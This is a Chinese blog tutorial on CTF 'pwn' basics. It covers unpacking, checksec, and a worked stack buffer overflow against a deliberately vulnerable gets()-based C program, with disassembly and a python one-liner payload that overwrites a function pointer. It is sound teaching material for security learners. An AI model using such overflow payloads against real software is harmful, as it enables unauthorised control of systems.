Pwn笔记

最新推荐文章于 2024-03-15 18:48:43 发布
最新推荐文章于 2024-03-15 18:48:43 发布
阅读量2.6k 收藏 6
点赞数
分类专栏: django 缓冲区溢出 文章标签: 缓冲区溢出 ctf 信息安全 二进制安全 漏洞分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caterpillarous/article/details/51177527
版权

Pwn笔记

-前言

以下内容摘自Wiki:
Pwn是一个骇客语法的俚语词,自”own”这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败(例如:”You just got pwned!”)。
在骇客行话里,尤其在另外一种电脑技术方面,包括电脑(服务器或个人电脑)、网站、闸道装置、或是应用程序,”pwn”在这一方面的意思是攻破(”to compromise”,危及、损害)或是控制(”to control”)。在这一方面的意义上,它与骇客入侵与破解是相同意思的。例如某一个外部团体已经取得未经公家许可的系统管理员控制权限,并利用这个权限骇入并入侵(”owned” 或是 “pwned”)这个系统。

-1.

当我们拿到一个pwn文件时,首先应当查壳。在ctf比赛中的pwn大多在Linux下,
Linux下没有很强力的壳,一般都是upx格式的壳,所以可以在命令行中用
upx -d file来进行脱壳操作

-2.

接下来,我们可以用checksec脚本来查询该文件使用了哪些防护技术。./checksec
--file file操作系统提供了许多安全机制来尝试降低或阻止缓冲区溢出攻击带来的安全
风险,包括DEP、ASLR等。在编写漏洞利用代码的时候,需要特别注意目标进程是否开启了
DEP(Linux下对应NX)、ASLR(Linux下对应PIE)等机制,例如存在DEP(NX)的话就
不能直接执行栈上的数据,存在ASLR的话各个系统调用的地址就是随机化的。checksec脚本可以
在这里下载。checksec

-3.

然后通过一个小例子来实践一下后续步骤

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  volatile int (*fp)();
  char buffer[64];

  fp = 0;

  gets(buffer);

  if(fp) {
      printf("calling function pointer, jumping to 0x%08x\n", fp);
      fp();
  }
}

在这个例子中,我们定义了一个函数指针。我们将利用缓冲区溢出,使得fp原本的值被win()
的地址所覆盖,从而改变程序的执行流程。
我们可以用gdb或者objdump来获取该文件main函数的反汇编代码
gdb中的指令为disas main
objdump中的指令为objdump -d file
获得的结果如下,这里我只列出了一些重要的代码:

08048473 <main>:
8048473: 8d 4c 24 04 lea 0x4(%esp),%ecx
8048477: 83 e4 f0 and $0xfffffff0,%esp ;内存对齐
804847a: ff 71 fc pushl -0x4(%ecx)
804847d: 55 push %ebp ;开辟栈帧
804847e: 89 e5 mov %esp,%ebp
8048480: 51 push %ecx
8048481: 83 ec 54 sub $0x54,%esp
8048484: c7 45 f4 00 00 00 00 movl $0x0,-0xc(%ebp) ;初始化函数指针的值
804848b: 83 ec 0c sub $0xc,%esp
804848e: 8d 45 b4 lea -0x4c(%ebp),%eax ;缓冲区的首地址
8048491: 50 push %eax ;通过栈来给gets传递参数
8048492: e8 89 fe ff ff call 8048320 <gets@plt>
8048497: 83 c4 10 add $0x10,%esp
804849a: 83 7d f4 00 cmpl $0x0,-0xc(%ebp) ;函数指针是否为0
804849e: 74 18 je 80484b8 <main+0x45>

这里我们可以看到fp的处于ebp-0xc的位置而缓冲区处于ebp-0x4c,可以求得
二者之间相距0x40个字节,所以我们只要将0x41-0x44个字节填充为win函数的地址即可。
我们可以通过这样一条管道命令来快速找到win函数的地址

objdump -d file | grep win
0804845b <win>:
因为这里需要填充的数据较多,所以我选择用python+管道命令来实现溢出
python -c "print 'A'*0x40+'\x5b\x84\x04\x08'" | ./file
calling function pointer, jumping to 0x0804845b
code flow successfully changed

有时候我们会遇到buffer是通过命令行参数传入的,这时我们也可以用相同的方法传入参数
只不过这时候我们要写成python -c "print 'A'*64+'\x5b\x84\x04\x08'" |xargs ./file

caterpillarous
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Pwn学习路线及学习笔记以及gem安装
10-15
Pwn学习路线及学习笔记
ctf-pwn-堆-调试
xy_369的博客
05-20 350
写这篇文章的目的是更好地去理解堆,不要只停留在理论知识阶段注:读这篇文章需要一定基础,不然读起来很费劲或读不懂,要是有ctf-pwn手的基本基础,只是缺乏堆这一块的知识,可以先把这篇文章读完,大致了解哪些地方写了哪些知识点,同时结合一些堆相关的链接去快速掌握堆在计算机内存中的运作方式。
CTF特训营》——PWN二进制安全基础
PICACHU+++的博客
08-13 2582
即DEP,是进制程序在非可执行的内存区中执行指令。在80x86体系中,操作系统的内存管理是通过页面表存储方式来实现,其最后一位就是NX位,0表示允许执行,1表示禁止执行。NX一般是防止直接在堆和栈上运行shellcode代码,gcc默认开启不可执行栈功能,添加编译选项z -exestack可开启栈可执行功能。...
Pwn】详细介绍
最新发布
cz88888888666的博客
03-15 571
通常指的是通过不同的攻击手段如利用漏洞、进行社会工程学攻击等方法成功地获得了一个设备、系统或网络的未授权控制权,一旦攻击者。是一个俚语,起源于电子游戏社区,经常在英语中用作网络或电子游戏文化中的一个术语,最初,这个词是。一个系统,他们就可以执行各种恶意活动,如窃取数据、安装恶意软件、或者制造更广泛的破坏。任务经常涉及在一个受限制的环境中寻找和利用漏洞来访问受保护的资源或系统。这个词的意义被扩展到其他领域,尤其是计算机安全,在网络安全语境中,另一个玩家,那通常意味着他们在竞技中显著地优于对手。
Pwn 二进制漏洞审计
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
02-28 2623
PWN 二进制漏洞审计
新手打pwn
m0_74736832的博客
07-05 721
攻击者可以使用格式化字符串的特性,将一个特定的值写入到可以修改canary的位置上,从而绕过检测。它是C语言中的标准函数库,提供了各种基础函数和数据类型的定义,以及多个常用功能的实现。弹出时的数据顺序:由于栈的"先进后出"原则,"pop"指令弹出的数据顺序与它们被"push"到栈中的顺序相反。当使用"pop"指令弹出数据时,栈指针会自动向下移动,指向新的栈顶位置。x86架构(如Intel和AMD处理器)中的"pop"指令:在x86汇编语言中,"pop"指令用于将栈顶的数据弹出并存储到目标操作数中。
pwn入门(3)堆
农夫果园好好喝的博客
07-22 604
是虚拟地址空间的一块连续的线性区域提供动态分配的内存,允许程序申请大小未知的内存在用户与操作系统之间,作为动态内存管理的中间人响应用户的申请内存请求,向操作系统申请内存,然后将其返回给用户程序管理用户所释放的内存,适时归还给操作系统。...
pwn-notes:我在pwn上的笔记
03-05
二进制利用说明欢迎来到我关于二进制漏洞利用的笔记。 在这里,我会记下我学到的大多数内容,并提供易受攻击的二进制文件,让您自己动手做。 提到了大多数“通用”堆栈技术以及一些超级介绍性的堆。 很快就会有更多:...
谷歌师兄的leetcode刷题笔记-Pwn-Pad-Arsenal-Tools:适用于Android设备的渗透测试应用
06-30
谷歌师兄的leetcode刷题笔记Pwn Pad 阿森纳工具 大家好, 我正在使用 Pwn Pad 2013(适用于 2012 版 Nexus 7 平板电脑)。 这是我最喜欢的 Android 应用程序列表以及一些 .sh 和 .apk 源和链接。 希望它会对某人有所...
STM32学习笔记
09-09
stm32基础的学习笔记,包括ADC,CAN,RCC,PWN
pwnable_kr:壳牌我们玩游戏吗?
05-14
笔记 阿洛卡 [怪诞] 代理服务器 rootkit dos4fun ASCII eg coin2 迷宫 世界野生动物基金会 [数独] 星际争霸 命令3 小精灵 lfh 洛基哈特 g [骇客的秘密] 无法利用 微小的 软体 XML文件 毛巾根 ...
攻防世界hello pwn WP(pwn入门基础题)
m0_62584974的博客
11-21 1911
攻防世界hello pwn WP(pwn入门基础题)的简单讲解
格式化字符串类盲pwn的dump方法
weixin_46483787的博客
04-11 539
有一类题目,不会给任何文件,只给一个ip和端口,这种称为blind pwn(盲pwn),如果这类pwn存在格式化字符串漏洞的话,可以通过一些手法拿到整个二进制程序,这对我们的逆向分析和解题是十分重要的,举个例子: 在2022年的Insomni’hack teaser比赛上,有一道题CovidLe$s,就是一道盲pwn,输入什么就回显什么,但是存在格式化字符串漏洞,并且应该是栈上的,通过不断的尝试是可以大致猜测出栈结构的: 从偏移12开始是栈上的缓冲区,29那里是canary,31是返回地址,根据后三位可以
PWN入门(一)
lulu001128的博客
04-24 2639
知识
pwn学习】格式化字符漏洞
Morphy_Amo的博客
12-29 5574
文章目录什么是格式化字符漏洞格式化字符串函数格式化字符串利用泄露内存例题 利用格式化字符串漏洞获取libc基址覆盖内存栈地址覆盖小数覆盖大数覆盖轮子 什么是格式化字符漏洞 格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。通俗来说,格式化字符串函数就是将计算机内存中表示的数据转化为我们人类可读的字符串格式。几乎所有的 C/C++ 程序都会利用格式化字符串函数来输出信息,调试程序,或者处理字符串。一般来说,格式化字符串在利用的时候主要分为三个部分。 格式化字符串函
ctf——pwn堆的基础知识
m0_64195960的博客
04-24 1834
1前言 一、笔者想说 笔者是一个不大聪明的pwn的新手,这是我根据《ctf权威竞赛指南》,b站课程,一些师傅的博客,ctfviki做的笔记,便于学习和复习 如果有错误的地方还请给位师傅指正 二、调试 下面所展示的gdb调试是根据一下调试的 注意: 1、调试记得执行到malloc后再去查看 2、记得编译 一、glibc堆概述 1)堆概述 堆是程序虚拟内存中由低地址向高地址增长的线性区域,出于效率和页对齐的考虑,通常会分配相当大的连续内存。程序再次申请时便会从这片内存中分配,直到堆空间
PWN-入门基础
工作学习笔记
05-27 3673
简单介绍四个方面的内容:一是什么是PWN、二是做PWN所需知识储备、三是基于Ubuntu搭建PWN环境、四是在公网上练习PWN题。
pwn-堆入门
yajuanpi4899的博客
12-19 840
pwn的堆入门
linux内核pwn,Linux内核pwn——劫持n_tty_ops指针
weixin_42355400的博客
04-29 289
0x001 前言以往多数的kernel pwn题都是基于内核扩展模块的漏洞分析,今天我们来看2018年Midnight Sun CTF一个无*.ko内核模块的题。题目下载:0x002 干掉定时logout由于内核运行一断时间后便会退出,需要解开文件系统,做一定修改mkdir coremv ./core.cpio ./core/cd corecpio -idmv < initrdrm init...
docker pwn
01-29
Docker Pwn是一种使用Docker容器来解决CTF(Capture The Flag)挑战的方法。它提供了一个轻量级的环境,可以在其中运行和调试二进制文件,以便进行漏洞利用和渗透测试。 要使用Docker Pwn,您可以按照以下步骤进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值